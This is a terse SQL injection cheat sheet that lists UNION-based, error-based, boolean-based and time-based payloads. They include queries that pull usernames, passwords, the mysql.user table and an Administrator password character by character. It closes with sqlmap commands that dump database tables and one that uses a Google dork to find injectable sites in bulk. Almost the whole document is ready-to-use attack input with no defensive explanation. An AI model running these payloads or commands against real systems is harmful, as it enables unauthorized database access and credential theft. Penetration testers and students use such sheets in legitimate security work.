SQL Injection
UNION-Based
# How To Detect
'
-- abc
# Find Number Of Columns
' ORDER BY 2-- abc
' UNION NULL,NULL-- abc
# Test Column Data Types
' UNION SELECT 'a',NULL-- abc
' UNION SELECT NULL,'a'-- abc
# Print Database Version
' UNION SELECT @@version,@@version-- abc
# Print Multiple Values In One Column
' UNION SELECT CONCAT('username','~','password') FROM users--
# Print Databases and Tables
' UNION SELECT table_name,table_schema FROM information_schema.tables-- abc
# Print Tables and Columns
' UNION SELECT table_name,column_name FROM information_schema.columns WHERE table_name ='user'-- abc
# Print Specific Database, Table and Columns
' UNION SELECT host,user FROM mysql.user-- abc
Error-Based
' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT @@version)))-- abc
' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1)))-- abc
Boolean-Based
# Detect
' AND 1=1-- abc
' AND 1=2-- abc
' AND '1'='1
' AND '1'='2
# Print Database Version
' AND @@version = '8.0.28'-- abc
' AND @@version LIKE '8.0.28'-- abc
# Infer Database Version One Character At A Time
' AND SUBSTRING((SELECT @@version),1,1) > '7'-- abc
' AND SUBSTRING((SELECT @@version),2,1) = '.'-- abc
# Print Database Name
' AND SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1) = 'i'-- abc
# Print Specific Entry
' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
# Boolean Conditional Errors
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
' AND (CASE WHEN (SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i') THEN 1/0 ELSE 'a' END)='a'-- abc
Time-Based
' AND SLEEP(5)-- abc
' AND IF(1=1,SLEEP(5),'a')-- abc
' AND IF((SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i'),SLEEP(5),'a')-- abc
SQLMAP
sqlmap -u https://domain.com/product.php?id=1 -p id --proxy http://192.168.43.164:8080 --random-agent --delay 0.5 --threads 10 --flush-session -v 3
sqlmap -g inurl:/product.asp?id= --random-agent --batch --smart
sqlmap -r request.txt --force-ssl --random-agent --level=3 --risk=2 --technique=B --threads=10 --banner --dbs
sqlmap -r request.txt --force-ssl --random-agent -D database_name -T table_name1,table_name2,table_name3 --dump
sqlmap -r request.txt --force-ssl --random-agent -v 4 -p "id,cookie" --cookie="_ga=*" --skip "code,x,host,user-agent,referer"
Reference: https://portswigger.net/web-security/sql-injection/cheat-sheet